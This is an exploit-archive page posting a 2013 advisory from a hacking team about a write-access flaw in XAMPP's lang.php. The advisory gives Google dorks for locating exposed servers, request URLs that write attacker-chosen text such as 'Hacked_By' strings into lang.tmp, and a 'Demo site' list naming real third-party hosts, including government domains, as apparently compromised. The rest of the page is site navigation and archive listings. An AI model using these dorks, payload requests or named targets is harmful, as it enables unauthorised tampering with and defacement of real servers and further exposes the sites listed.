XAMPP Local Write Access

XAMPP Local Write Access: Posted Oct 15, 2013; Authored by Iranian_Dark_Coders_Team; XAMPP suffers from a local write access vulnerability.; tags | exploit, local; SHA-256 | d4e1c79f52b45915d4796dddbec5e1b6afeb47624dcc78e39ebde1fa02f92986; Download | Favorite | View

XAMPP Local Write Access

#######################################################
#
# [+] Exploit Title: XAMPP All Version Local Write Access Vulnerability
# [+] Google Dork 1 : inurl:/xampp/lang.php
# [+] Google Dork 2 : inurl:/security/lang.php
# [+] Date: 15/10/2013
# [+] Discovered By : Black.Hack3r
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Vendor Homepage: http://www.apachefriends.org
# [+] Version: All Version
# [+] Tested on: Windows 7
########################################################
#
# [+] BACKGROUND:
#
#  XAMPP is a free and open source cross-platform web server solution stack
#  package, consisting mainly of the Apache HTTP Server, MySQL database, and 
#  interpreters for scripts written in the PHP and Perl programming languages.
#
#######################################################
#
# [+] DESCRIPTION:
#
#  It has been detected than an unprivileged user can write in the local
#  disk and the local file "lang.tmp" can be modified in the remote machine.
#  The injection is done through the page "/xampp/lang.php".
#
#######################################################
#
# [+] VULNERABILITY:
#
#  XAMPP All Version Local Write Access Vulnerability
#
#######################################################
#
# [+] Exploit:
#
#  http://localhost/[path]/xampp/lang.php
#  http://localhost/[path]/security/lang.php
#
#######################################################
#
# [+] Proof:
#
#  http://localhost/[path]/xampp/lang.php?WriteIntoLocalDisk
#  http://localhost/[path]/security/lang.php?WriteIntoLocalDisk
#
#  Example 1 :  http://localhost/[path]/xampp/lang.php?Hacked_By_Black.Hack3r_______________Iranian_Dark_Coders_Team
#  Example 2 :  http://localhost/[path]/security/lang.php?Hacked_By_Black.Hack3r_______________Iranian_Dark_Coders_Team
#  
#  And next, if we access to the file:
#
#  http://localhost/[path]/xampp/lang.tmp
#  http://localhost/[path]/security/lang.php
#
#######################################################
#
# [+] Demo site:
#
#  https://www.hsrdw.gov.cn/xampp/lang.tmp
#  https://www.hspop.gov.cn/xampp/lang.tmp
#  https://www.hsjrzw.gov.cn/xampp/lang.tmp
#  http://www.hrgiger.net//xampp/lang.tmp
#  https://www.tbtvn.org//xampp/lang.tmp
#  http://buru.no-ip.org//xampp/lang.tmp
#  http://ailbologna.it//xampp/lang.tmp
#  http://actionmu.info//xampp/lang.tmp
#
#######################################################
#
# [+] Discovered By : Black.Hack3r
# [+] We Are : M.R.S.CO,Black.Hack3r,N3O
# [+] SpTnx : Mr.Cicili,Sec4ever,D$@d_M@n,shahram black hat,MR.0x41,C@M!S3R_H3X,M4H4N,Security,@3is,HOt0N,All Members In www.idc-team.net
# [+] Home : http://www.idc-team.net
#
#######################################################

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

XAMPP Local Write Access

XAMPP Local Write Access

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

XAMPP Local Write Access

Share This

XAMPP Local Write Access

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems